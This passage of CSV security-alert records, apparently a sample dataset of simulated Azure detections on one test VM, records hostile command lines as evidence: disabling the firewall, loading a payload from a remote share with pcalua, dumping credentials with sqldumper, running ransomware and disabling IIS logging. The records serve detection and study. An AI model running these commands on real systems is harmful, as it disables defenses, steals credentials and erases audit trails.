""Suspicious Process"": ""c:\\diagnostics\\usertmp\\netsh.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\netsh.exe firewall set opmode mode=disable profile=all"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x28c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""netsh.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x28c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\netsh.exe firewall set opmode mode=disable profile=all"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.6700488Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.6700488Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.6700488Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
115,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,ad1fd62a-9565-41e4-b94a-6264942033f6,2518547714811337754_ad1fd62a-9565-41e4-b94a-6264942033f6,Detection,Microsoft,Detected suspicious use of Pcalua.exe to launch executable code,Detected suspicious use of Pcalua.exe to launch executable code,Detected suspicious use of Pcalua.exe to launch executable code,"Analysis of host data on MSTICALERTSWIN1 detected the use of pcalua.exe to launch executable code. Pcalua.exe is component of the Microsoft Windows ""Program Compatibility Assistant"" which detects compatibility issues during the installation or execution of a program. Attackers are known to abuse functionality of legitimate Windows system tools to perform malicious actions, for example using pcalua.exe with the -a switch to launch malicious executables either locally or from remote shares.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\pcalua.exe"",
""Suspicious Command Line"": ""pcalua.exe -a \\\\server\\payload.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1464"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""pcalua.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1464"",
""CommandLine"": ""pcalua.exe -a \\\\server\\payload.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.8662245Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.8662245Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.8662245Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
116,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,38d53571-e98a-4bb6-a17f-0361a561019e,2518547714814533914_38d53571-e98a-4bb6-a17f-0361a561019e,Detection,Microsoft,Detected possible execution of keygen executable,Detected possible execution of keygen executable,Detected possible execution of keygen executable,Analysis of host data on MSTICALERTSWIN1 detected execution of a process whose name is indicative of a keygen tool; such tools are typically used to defeat software licencing mechanisms but their download is often bundled with other malicious software. Activity group GOLD has been known to make use of such keygens to covertly gain back door access to hosts that they compromise.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\a_keygen.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\a_keygen.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17f8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""a_keygen.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17f8"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\a_keygen.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.5466085Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.5466085Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.5466085Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
117,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,5b42a152-64c2-4f16-8cc3-887b8b0161fc,2518547714811804858_5b42a152-64c2-4f16-8cc3-887b8b0161fc,Detection,Microsoft,Detected suspicious execution of VBScript.Encode command,Detected suspicious execution of VBScript.Encode command,Detected suspicious execution of VBScript.Encode command,"Analysis of host data on MSTICALERTSWIN1 detected the execution of VBScript.Encode command. This encodes the scripts into unreadable text, making it more difficult for users to examine the code. Microsoft threat research shows that attackers often use encoded VBscript files as part of their attack to evade detection systems. This could be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo /e:vbscript.encode /b"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x147c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x147c"",
""CommandLine"": ""cmd /c echo /e:vbscript.encode /b"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.8195141Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.8195141Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.8195141Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
118,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:19,2019-01-15 05:15:19,76bf04a5-71fa-487a-9742-d54941a7a194,2518547714809416002_76bf04a5-71fa-487a-9742-d54941a7a194,Detection,Microsoft,Possible credential dumping detected,Possible credential dumping detected,Possible credential dumping detected,Analysis of host data has detected use of native windows tool( e.g. sqldumper.exe) being used in a way that allows to extract credentials from memory. Often times attackers use these techniques to extract credentials that they then further use for lateral movement and privelege escalation.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\sqldumper.exe"",
""Suspicious Command Line"": ""sqldumper.exe 464 0 0x0110:40"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""sqldumper.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e8"",
""CommandLine"": ""sqldumper.exe 464 0 0x0110:40"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:19.0583997Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:19.0583997Z"",
""EndTimeUtc"": ""2019-01-15T05:15:19.0583997Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
119,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,d5e026fa-6687-495e-878d-c4c93477cc78,2518547714812286467_d5e026fa-6687-495e-878d-c4c93477cc78,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the hsot and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1404"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=tL87fydg2X3ANo7oW3HGLc%2BTDgcnvawDxPkkDILtH7Q%3D&spr=https&st=2019-01-14T17:39:21Z&se=2019-04-14T17:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1404"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.7713532Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.7713532Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.7713532Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
120,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:16,2019-01-15 05:15:16,8df27789-fb10-4035-ac48-cd0883b2e6b0,2518547714831067013_8df27789-fb10-4035-ac48-cd0883b2e6b0,Detection,Microsoft,Detected actions indicative of disabling and deleting IIS log files.,Detected actions indicative of disabling and deleting IIS log files.,Detected actions indicative of disabling and deleting IIS log files.,Analysis of host data detected actions that show IIS log files being disabled and/or deleted.,Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&c:\\windows\\system32\\inetsrv\\appcmd set config \""default web site/\"" /section:httplogging /dontlog:true&echo [s]&cd&echo [e]\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14ec"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14ec"",
""CommandLine"": "".\\cmd /c \""cd /d \""c:\\inetpub\\wwwroot\""&c:\\windows\\system32\\inetsrv\\appcmd set config \""default web site/\"" /section:httplogging /dontlog:true&echo [s]&cd&echo [e]\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:16.8932986Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:16.8932986Z"",
""EndTimeUtc"": ""2019-01-15T05:15:16.8932986Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:20,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
121,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:18,2019-01-15 05:15:18,9a34d332-2fb6-4f3f-beb0-d9817dc9b7cd,2518547714815009424_9a34d332-2fb6-4f3f-beb0-d9817dc9b7cd,Detection,Microsoft,Detected possible execution of malware dropper,Detected possible execution of malware dropper,Detected possible execution of malware dropper,Analysis of host data on MSTICALERTSWIN1 detected a filename that has previously been associated with one of activity group GOLD's methods of installing malware on a victim host.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0xfaac27"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\2840.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\2840.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x17a8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: GOLD\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-AGP-GOLD.pdf?sv=2018-03-28&sr=b&sig=vAwQabeTf42yaWjRqLZXxfkyAHl%2B97yko7Ag7o9mKl4%3D&spr=https&st=2019-01-14T11:45:20Z&se=2019-04-14T12:00:20Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=9083b91f-eeee-467c-9770-82df2b1f0420\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0xfaac27""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""2840.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x17a8"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\2840.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T05:15:18.4990575Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0xfaac27"",
""StartTimeUtc"": ""2019-01-15T05:15:18.4990575Z"",
""EndTimeUtc"": ""2019-01-15T05:15:18.4990575Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 05:15:25,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
122,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:17,2019-01-15 05:15:17,58694b54-2bee-4160-9595-30903b466f6e,2518547714825070946_58694b54-2bee-4160-9595-30903b466f6e,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1630"",
""account logon id"": ""0xfaac27"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xbc8"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=1uKLWM0uhSH97fMjwKzETgt80a8Adpp8YeURexaRhxI%3D&spr=https&st=2019-01-14T14:16:16Z&se=2019-04-14T14:31:16Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xbc8"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
